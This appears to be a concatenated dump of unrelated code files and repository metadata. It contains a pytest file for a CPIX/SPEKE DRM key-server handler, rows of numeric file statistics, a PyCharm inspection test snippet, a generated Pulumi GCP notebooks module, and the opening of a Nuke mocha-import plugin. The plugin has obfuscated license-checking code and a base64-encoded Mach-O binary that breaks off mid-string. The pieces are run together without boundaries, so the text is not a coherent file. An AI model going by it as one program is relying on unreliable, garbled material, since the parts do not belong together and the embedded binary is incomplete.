INPUT_XML = b'<?xml version="1.0" encoding="UTF-8"?><cpix:CPIX id="5E99137A-BD6C-4ECC-A24D-A3EE04B4E011" xmlns:cpix="urn:dashif:org:cpix" xmlns:pskc="urn:ietf:params:xml:ns:keyprov:pskc" xmlns:speke="urn:aws:amazon:com:speke"><cpix:ContentKeyList><cpix:ContentKey kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"></cpix:ContentKey></cpix:ContentKeyList><cpix:DRMSystemList><cpix:DRMSystem kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe" systemId="81376844-f976-481e-a84e-cc25d39b0b33"> <cpix:ContentProtectionData /> <speke:KeyFormat /> <speke:KeyFormatVersions /> <speke:ProtectionHeader /> <cpix:PSSH /> <cpix:URIExtXKey /></cpix:DRMSystem></cpix:DRMSystemList><cpix:ContentKeyPeriodList><cpix:ContentKeyPeriod id="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" index="11425"/></cpix:ContentKeyPeriodList><cpix:ContentKeyUsageRuleList><cpix:ContentKeyUsageRule kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:KeyPeriodFilter periodId="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622"/></cpix:ContentKeyUsageRule></cpix:ContentKeyUsageRuleList></cpix:CPIX>' # noqa
EXPECTED_XML = b'<cpix:CPIX xmlns:cpix="urn:dashif:org:cpix" xmlns:pskc="urn:ietf:params:xml:ns:keyprov:pskc" xmlns:speke="urn:aws:amazon:com:speke" id="5E99137A-BD6C-4ECC-A24D-A3EE04B4E011"><cpix:ContentKeyList><cpix:ContentKey kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:Data><pskc:Secret><pskc:PlainValue>MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA=</pskc:PlainValue></pskc:Secret></cpix:Data></cpix:ContentKey></cpix:ContentKeyList><cpix:DRMSystemList><cpix:DRMSystem kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe" systemId="81376844-f976-481e-a84e-cc25d39b0b33"> <cpix:ContentProtectionData /> <speke:KeyFormat /> <speke:KeyFormatVersions /> <speke:ProtectionHeader /> <cpix:PSSH /> <cpix:URIExtXKey>aHR0cHM6Ly9leGFtcGxlLmNvbS9rZXlzLzAwMDAua2V5</cpix:URIExtXKey></cpix:DRMSystem></cpix:DRMSystemList><cpix:ContentKeyPeriodList><cpix:ContentKeyPeriod id="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" index="11425" /></cpix:ContentKeyPeriodList><cpix:ContentKeyUsageRuleList><cpix:ContentKeyUsageRule kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:KeyPeriodFilter periodId="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" /></cpix:ContentKeyUsageRule></cpix:ContentKeyUsageRuleList></cpix:CPIX>' # noqa
@patch('app.KeyCache')
def test_sample_request(mock):
""" 入力のサンプルを与えた場合のテスト """
# mocked key cache
mock().get.return_value = b'00000000000000000000000000000000'
mock().url.return_value = 'https://example.com/keys/0000.key'
# get valid response
raw_body = b'<?xml version="1.0" encoding="UTF-8"?><cpix:CPIX id="5E99137A-BD6C-4ECC-A24D-A3EE04B4E011" xmlns:cpix="urn:dashif:org:cpix" xmlns:pskc="urn:ietf:params:xml:ns:keyprov:pskc" xmlns:speke="urn:aws:amazon:com:speke"><cpix:ContentKeyList><cpix:ContentKey kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"></cpix:ContentKey></cpix:ContentKeyList><cpix:DRMSystemList><cpix:DRMSystem kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe" systemId="81376844-f976-481e-a84e-cc25d39b0b33"> <cpix:ContentProtectionData /> <speke:KeyFormat /> <speke:KeyFormatVersions /> <speke:ProtectionHeader /> <cpix:PSSH /> <cpix:URIExtXKey /></cpix:DRMSystem></cpix:DRMSystemList><cpix:ContentKeyPeriodList><cpix:ContentKeyPeriod id="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" index="11425"/></cpix:ContentKeyPeriodList><cpix:ContentKeyUsageRuleList><cpix:ContentKeyUsageRule kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:KeyPeriodFilter periodId="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622"/></cpix:ContentKeyUsageRule></cpix:ContentKeyUsageRuleList></cpix:CPIX>' # noqa
target.app.current_request = MagicMock(raw_body=raw_body)
with patch('os.environ') as menv:
menv.get.return_value = '81376844-f976-481e-a84e-cc25d39b0b33'
res = target.copy_protection().to_dict()
assert res['statusCode'] == 200
assert res['body'] == EXPECTED_XML
@patch('app.KeyCache')
def test_error1_request(mock):
""" 入力のサンプルを与えた場合のテスト """
# mocked key cache
mock().get.return_value = b'00000000000000000000000000000000'
mock().url.return_value = 'https://example.com/keys/0000.key'
# get valid response
raw_body = b'<?xml version="1.0" encoding="UTF-8"?><cpix:CPIX id="5E99137A-BD6C-4ECC-A24D-A3EE04B4E011" xmlns:cpix="urn:dashif:org:cpix" xmlns:pskc="urn:ietf:params:xml:ns:keyprov:pskc" xmlns:speke="urn:aws:amazon:com:speke"><cpix:ContentKeyList><cpix:ContentKey kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"></cpix:ContentKey></cpix:ContentKeyList><cpix:DRMSystemList><cpix:DRMSystem kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe" systemId="ERROR"> <cpix:ContentProtectionData /> <speke:KeyFormat /> <speke:KeyFormatVersions /> <speke:ProtectionHeader /> <cpix:PSSH /> <cpix:URIExtXKey /></cpix:DRMSystem></cpix:DRMSystemList><cpix:ContentKeyPeriodList><cpix:ContentKeyPeriod id="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622" index="11425"/></cpix:ContentKeyPeriodList><cpix:ContentKeyUsageRuleList><cpix:ContentKeyUsageRule kid="6c5f5206-7d98-4808-84d8-94f132c1e9fe"><cpix:KeyPeriodFilter periodId="keyPeriod_e64248f6-f307-4b99-aa67-b35a78253622"/></cpix:ContentKeyUsageRule></cpix:ContentKeyUsageRuleList></cpix:CPIX>' # noqa
target.app.current_request = MagicMock(raw_body=raw_body)
with patch('os.environ'):
res = target.copy_protection().to_dict()
assert res['statusCode'] == 500
| 111.584906
| 1,230
| 0.762428
| 701
| 5,914
| 6.376605
| 0.188302
| 0.02953
| 0.040268
| 0.051007
| 0.917673
| 0.907383
| 0.899776
| 0.891051
| 0.891051
| 0.891051
| 0
| 0.141023
| 0.077951
| 5,914
| 52
| 1,231
| 113.730769
| 0.678709
| 0.032296
| 0
| 0.548387
| 0
| 0.129032
| 0.814047
| 0.703248
| 0
| 0
| 0
| 0
| 0.16129
| 1
| 0.096774
| false
| 0
| 0.064516
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b47f64aeb7d5b04e42ddf73ec0b6109f28d461df
| 192
|
py
|
Python
|
python/testData/inspections/PyArgumentListInspection/unicodeConstructor.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyArgumentListInspection/unicodeConstructor.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyArgumentListInspection/unicodeConstructor.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
print(unicode())
print(unicode(''))
print(unicode('', 'utf-8'))
print(unicode('', 'utf-8', 'ignore'))
print(unicode('', 'utf-8', 'ignore', <warning descr="Unexpected argument">foo</warning>))
| 32
| 89
| 0.645833
| 24
| 192
| 5.166667
| 0.416667
| 0.483871
| 0.362903
| 0.387097
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01676
| 0.067708
| 192
| 5
| 90
| 38.4
| 0.675978
| 0
| 0
| 0
| 0
| 0
| 0.239583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c32c16e756be6b98c726b9e6b7d262fc4db468e4
| 144
|
py
|
Python
|
app/utils.py
|
dormantman/simple-insurance
|
fe54aa75fcecebc222d3e8ce734ff8aed737d6fe
|
[
"MIT"
] | null | null | null |
app/utils.py
|
dormantman/simple-insurance
|
fe54aa75fcecebc222d3e8ce734ff8aed737d6fe
|
[
"MIT"
] | null | null | null |
app/utils.py
|
dormantman/simple-insurance
|
fe54aa75fcecebc222d3e8ce734ff8aed737d6fe
|
[
"MIT"
] | null | null | null |
from tortoise.contrib.fastapi import HTTPNotFoundError
def template_for_404():
return dict(responses={404: {"model": HTTPNotFoundError}})
| 24
| 62
| 0.777778
| 16
| 144
| 6.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 0.111111
| 144
| 5
| 63
| 28.8
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c3545dfd1f74a393edbd959a402e4ccedcc6cb6a
| 171
|
py
|
Python
|
src/microspeclib/datatypes/__init__.py
|
microspectrometer/microspec
|
c5013e80106789619ad19b3bd91e3e0edb115e42
|
[
"MIT"
] | null | null | null |
src/microspeclib/datatypes/__init__.py
|
microspectrometer/microspec
|
c5013e80106789619ad19b3bd91e3e0edb115e42
|
[
"MIT"
] | null | null | null |
src/microspeclib/datatypes/__init__.py
|
microspectrometer/microspec
|
c5013e80106789619ad19b3bd91e3e0edb115e42
|
[
"MIT"
] | null | null | null |
# Copyright 2020 by Chromation, Inc
# All Rights Reserved by Chromation, Inc
from .bridge import *
from .sensor import *
from .command import *
from .types import *
| 19
| 40
| 0.725146
| 23
| 171
| 5.391304
| 0.608696
| 0.241935
| 0.241935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.204678
| 171
| 8
| 41
| 21.375
| 0.882353
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c361bcb6ecaa0b83fe4ad9000bd372384158619b
| 8,885
|
py
|
Python
|
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
dimpu47/pulumi-gcp
|
38355de300a5768e11c49d344a8165ba0735deed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
dimpu47/pulumi-gcp
|
38355de300a5768e11c49d344a8165ba0735deed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/notebooks/_inputs.py
|
dimpu47/pulumi-gcp
|
38355de300a5768e11c49d344a8165ba0735deed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'EnvironmentContainerImageArgs',
'EnvironmentVmImageArgs',
'InstanceAcceleratorConfigArgs',
'InstanceContainerImageArgs',
'InstanceVmImageArgs',
]
@pulumi.input_type
class EnvironmentContainerImageArgs:
def __init__(__self__, *,
repository: pulumi.Input[str],
tag: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] repository: The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
:param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
"""
pulumi.set(__self__, "repository", repository)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def repository(self) -> pulumi.Input[str]:
"""
The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
"""
return pulumi.get(self, "repository")
@repository.setter
def repository(self, value: pulumi.Input[str]):
pulumi.set(self, "repository", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
"""
The tag of the container image. If not specified, this defaults to the latest tag.
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@pulumi.input_type
class EnvironmentVmImageArgs:
def __init__(__self__, *,
project: pulumi.Input[str],
image_family: Optional[pulumi.Input[str]] = None,
image_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
:param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
:param pulumi.Input[str] image_name: Use VM image name to find the image.
"""
pulumi.set(__self__, "project", project)
if image_family is not None:
pulumi.set(__self__, "image_family", image_family)
if image_name is not None:
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def project(self) -> pulumi.Input[str]:
"""
The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: pulumi.Input[str]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="imageFamily")
def image_family(self) -> Optional[pulumi.Input[str]]:
"""
Use this VM image family to find the image; the newest image in this family will be used.
"""
return pulumi.get(self, "image_family")
@image_family.setter
def image_family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_family", value)
@property
@pulumi.getter(name="imageName")
def image_name(self) -> Optional[pulumi.Input[str]]:
"""
Use VM image name to find the image.
"""
return pulumi.get(self, "image_name")
@image_name.setter
def image_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_name", value)
@pulumi.input_type
class InstanceAcceleratorConfigArgs:
def __init__(__self__, *,
core_count: pulumi.Input[float],
type: pulumi.Input[str]):
"""
:param pulumi.Input[float] core_count: Count of cores of this accelerator.
:param pulumi.Input[str] type: Type of this accelerator.
Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `TPU_V2`, and `TPU_V3`.
"""
pulumi.set(__self__, "core_count", core_count)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="coreCount")
def core_count(self) -> pulumi.Input[float]:
"""
Count of cores of this accelerator.
"""
return pulumi.get(self, "core_count")
@core_count.setter
def core_count(self, value: pulumi.Input[float]):
pulumi.set(self, "core_count", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of this accelerator.
Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `TPU_V2`, and `TPU_V3`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class InstanceContainerImageArgs:
def __init__(__self__, *,
repository: pulumi.Input[str],
tag: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] repository: The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
:param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
"""
pulumi.set(__self__, "repository", repository)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def repository(self) -> pulumi.Input[str]:
"""
The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
"""
return pulumi.get(self, "repository")
@repository.setter
def repository(self, value: pulumi.Input[str]):
pulumi.set(self, "repository", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
"""
The tag of the container image. If not specified, this defaults to the latest tag.
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@pulumi.input_type
class InstanceVmImageArgs:
def __init__(__self__, *,
project: pulumi.Input[str],
image_family: Optional[pulumi.Input[str]] = None,
image_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
:param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
:param pulumi.Input[str] image_name: Use VM image name to find the image.
"""
pulumi.set(__self__, "project", project)
if image_family is not None:
pulumi.set(__self__, "image_family", image_family)
if image_name is not None:
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def project(self) -> pulumi.Input[str]:
"""
The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: pulumi.Input[str]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="imageFamily")
def image_family(self) -> Optional[pulumi.Input[str]]:
"""
Use this VM image family to find the image; the newest image in this family will be used.
"""
return pulumi.get(self, "image_family")
@image_family.setter
def image_family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_family", value)
@property
@pulumi.getter(name="imageName")
def image_name(self) -> Optional[pulumi.Input[str]]:
"""
Use VM image name to find the image.
"""
return pulumi.get(self, "image_name")
@image_name.setter
def image_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_name", value)
| 35.54
| 261
| 0.631739
| 1,098
| 8,885
| 4.928051
| 0.10929
| 0.107743
| 0.113842
| 0.073184
| 0.844945
| 0.817594
| 0.806875
| 0.806875
| 0.800222
| 0.800222
| 0
| 0.00527
| 0.252561
| 8,885
| 249
| 262
| 35.682731
| 0.809517
| 0.319977
| 0
| 0.77305
| 1
| 0
| 0.084936
| 0.019238
| 0
| 0
| 0
| 0
| 0
| 1
| 0.205674
| false
| 0
| 0.035461
| 0
| 0.361702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c37d5166f331610d42f7a0a7b9737c015503fdb1
| 134
|
py
|
Python
|
python/testData/joinLines/ListOfStrings.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/joinLines/ListOfStrings.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/joinLines/ListOfStrings.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
a = [ "AAAAAAA", "BBBBB" "AAAAAAA", "BBBBB" "AAAAAAA",<caret> "BBBBB" "AAAAAAA",
"BBBBB" "AAAAAAA", "BBBBB" "AAAAAAA", "BBBBB"]
| 67
| 81
| 0.58209
| 14
| 134
| 5.571429
| 0.285714
| 0.769231
| 0.974359
| 0.923077
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156716
| 134
| 2
| 82
| 67
| 0.690265
| 0
| 0
| 0
| 0
| 0
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ee15a2f5e6b800f316f422e0d07101011ec409a
| 417,912
|
py
|
Python
|
python/mamoworld/mochaImportPlus/version_03f30d0a/mochaimport.py
|
smile-jing/NukeToolSet
|
45a2523f3bfa60fbfb03c9702bbdd20cf42cb331
|
[
"MIT"
] | 81
|
2016-05-05T15:04:43.000Z
|
2022-03-21T06:54:22.000Z
|
python/mamoworld/mochaImportPlus/version_03f30d0a/mochaimport.py
|
ensii75/NukeToolSet
|
0c47efc3bc7ca513f902e00a3e2b71404636aae9
|
[
"MIT"
] | 8
|
2018-04-04T16:35:26.000Z
|
2022-02-10T09:56:30.000Z
|
python/mamoworld/mochaImportPlus/version_03f30d0a/mochaimport.py
|
ensii75/NukeToolSet
|
0c47efc3bc7ca513f902e00a3e2b71404636aae9
|
[
"MIT"
] | 51
|
2016-05-07T14:27:42.000Z
|
2022-02-10T05:55:11.000Z
|
#! /usr/bin/env python 2.7 (62211)
# coding=utf-8
# Compiled at: 2015-04-01 08:00:59
__all__ = ['createStabilizedView', 'createCornerPin', 'createTracker3Node', 'createTracker4Node',
'createRotoPaintNodeMI', 'createRotoNodeMI', 'createGridWarpNodeMI', 'createSplineWarpNodeMI',
'createTransformNodeMI', 'createCameraAndPointCloud', 'createCameraRig', 'setUseGizmos',
'applyMochaDataToNode']
import nuke as b
import re
import pprint
def Q(eF):
return map(lambda (ac, aJ): b.AnimationKey(ac, aJ), eF)
def dg(d, eG, eH, eI, eJ):
bu(d, eG, 0)
bu(d, eH, 1)
bu(d, eI, 2)
bu(d, eJ, 3)
def bu(d, knob, Y):
knob.setAnimated()
eK = Q(d.getPointValues(Y, 'x'))
eL = Q(d.getPointValues(Y, 'y'))
knob.animation(0).clear()
knob.animation(1).clear()
knob.animation(0).addKey(eK)
knob.animation(1).addKey(eL)
def bv(Z, name, aK):
dh = b.XY_Knob(name, aK)
Z.addKnob(dh)
dh.setTooltip('corner pin tracking data')
def eM(Z):
cf = b.PyScript_Knob('loadTrackingDataFromFile', 'load tracking data from file')
cf.setTooltip('import mocha corner pin data from a file\n\nrequired format: Nuke Corner Pin (*.nk)')
cf.setCommand('import cornerPinData\ncornerPinData___loadCornerPinDataFromFile(nuke.thisNode() )')
Z.addKnob(cf)
Z.addKnob(b.Text_Knob('divName', '', ''))
bv(Z, 'pin1', 'pin 1')
bv(Z, 'pin2', 'pin 2')
bv(Z, 'pin3', 'pin 3')
bv(Z, 'pin4', 'pin 4')
di = b.Array_Knob('pinTimeOffset', 'Corner Pin Time Offset')
di.setTooltip('shift your tracking data if it does not start at the first frame')
Z.addKnob(di)
def eN(i, ai):
aj(i, ai, 'filter', False)
aj(i, ai, 'clamp', False)
aj(i, ai, 'black_outside', False)
aj(i, ai, 'motionblur', True)
aj(i, ai, 'shutter', True)
aj(i, ai, 'shutteroffset', True)
aj(i, ai, 'shuttercustomoffset', False).setLabel('')
def aj(eO, eP, dj, eQ):
knob = b.Link_Knob(dj)
knob.makeLink(eO.name(), dj)
if eQ:
knob.setFlag(b.STARTLINE)
else:
knob.clearFlag(b.STARTLINE)
eP.addKnob(knob)
return knob
import nuke as b
from Qt import QtWidgets as l
from tempfile import mkstemp as hg
import os as al
import stat as dl
from subprocess import Popen, PIPE as fa
from platform import system as bw, architecture as eW
import re
class cg(Exception):
pass
class eR(object):
def __init__(a, qqewrtz, qqrrtet):
a.qqewrtz = qqewrtz
a.qqrrtet = qqrrtet
a.qqgerter = a.ertuze()
a.qqjztzt = a.hrrwre()
def sddfg(a):
ad = a.qqgerter.execute([a.qqewrtz, '-'])
ak = ad[0]
ae = ad[1]
if ak != '' or ae != '':
raise cg('could not remove license' + str(ak) + str(ae))
def zzdfger(a, ch):
eS = re.compile('^[A-Z]{2}[A-Z0-9]{30}$')
s = eS.match(ch) != None
return s
def ddsjz(a, ch):
eT = ch.strip()
ad = a.qqgerter.execute([a.qqewrtz, eT])
ak = ad[0]
ae = ad[1]
if ae != '':
raise cg('could not install license' + str(ak) + str(ae))
def fggtzh(a):
h = a.ertzz()
return h['status'] == 'valid'
def hf(a):
h = a.ertzz()
return h['status'] == 'valid' and h['license type'] == 'BTA'
def ertzz(a):
ad = a.qqjztzt.execute([a.qqewrtz, a.qqrrtet])
ak = ad[0]
ae = ad[1]
if ae != '':
raise cg('could not validate license' + str(ak) + str(ae))
h = a.tetz(ak)
return h
def tetz(a, data):
eU = re.compile(
"^status:\\s*([^\\r\\n]*)\\s*first name:\\s*'(.*)'\\s*last name:\\s*'(.*)'\\s*number of user licenses:\\s*(\\d*)\\s*license type:\\s*'(.*)'\\s*pluginID")
ar = eU.match(data)
if ar == None:
raise Exception('invalid licensing info')
h = {'status': ar.group(1), 'first name': ar.group(2), 'last name': ar.group(3),
'number of user licenses': ar.group(4), 'license type': ar.group(5)}
return h
def hrrwre(a):
if a.__isMacOs():
R = at(
'z/rt/gcAAAEDAACAAgAAABIAAABoCQAAhYAhAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAeAIAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAABwAAAAAAAAAAAAAAAAAAAAcAAAAAAAAAcAAAAFAAAABwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAFANAAABAAAAEUwAAAAAAABQDQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAYlkAAAEAAACGAQAAAAAAAGJZAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADoWgAAAQAAAHwCAAAAAAAA6FoAAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2djY19leGNlcHRfdGFiX19URVhUAAAAAAAAAAAAAGRdAAABAAAARAoAAAAAAABkXQAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fY3N0cmluZwAAAAAAAABfX1RFWFQAAAAAAAAAAAAAqGcAAAEAAAARAgAAAAAAAKhnAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAX191bndpbmRfaW5mbwAAAF9fVEVYVAAAAAAAAAAAAAC5aQAAAQAAAPwAAAAAAAAAuWkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABfX2VoX2ZyYW1lAAAAAAAAX19URVhUAAAAAAAAAAAAALhqAAABAAAAQAUAAAAAAAC4agAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABkAAADIAgAAX19EQVRBAAAAAAAAAAAAAABwAAABAAAAABAAAAAAAAAAcAAAAAAAAAAQAAAAAAAABwAAAAMAAAAIAAAAAAAAAF9fcHJvZ3JhbV92YXJzAABfX0RBVEEAAAAAAAAAAAAAAHAAAAEAAAAoAAAAAAAAAABwAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19nb3QAAAAAAAAAAAAAAF9fREFUQQAAAAAAAAAAAAAocAAAAQAAADAAAAAAAAAAKHAAAAMAAAAAAAAAAAAAAAYAAABBAAAAAAAAAAAAAABfX25sX3N5bWJvbF9wdHIAX19EQVRBAAAAAAAAAAAAAFhwAAABAAAAEAAAAAAAAABYcAAAAwAAAAAAAAAAAAAABgAAAEcAAAAAAAAAAAAAAF9fbGFfc3ltYm9sX3B0cgBfX0RBVEEAAAAAAAAAAAAAaHAAAAEAAAAIAgAAAAAAAGhwAAADAAAAAAAAAAAAAAAHAAAASQAAAAAAAAAAAAAAX19tb2RfaW5pdF9mdW5jAF9fREFUQQAAAAAAAAAAAABwcgAAAQAAABgAAAAAAAAAcHIAAAMAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19EQVRBAAAAAAAAAAAAAJByAAABAAAAEAAAAAAAAACQcgAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fY29tbW9uAAAAAAAAAABfX0RBVEEAAAAAAAAAAAAAoHIA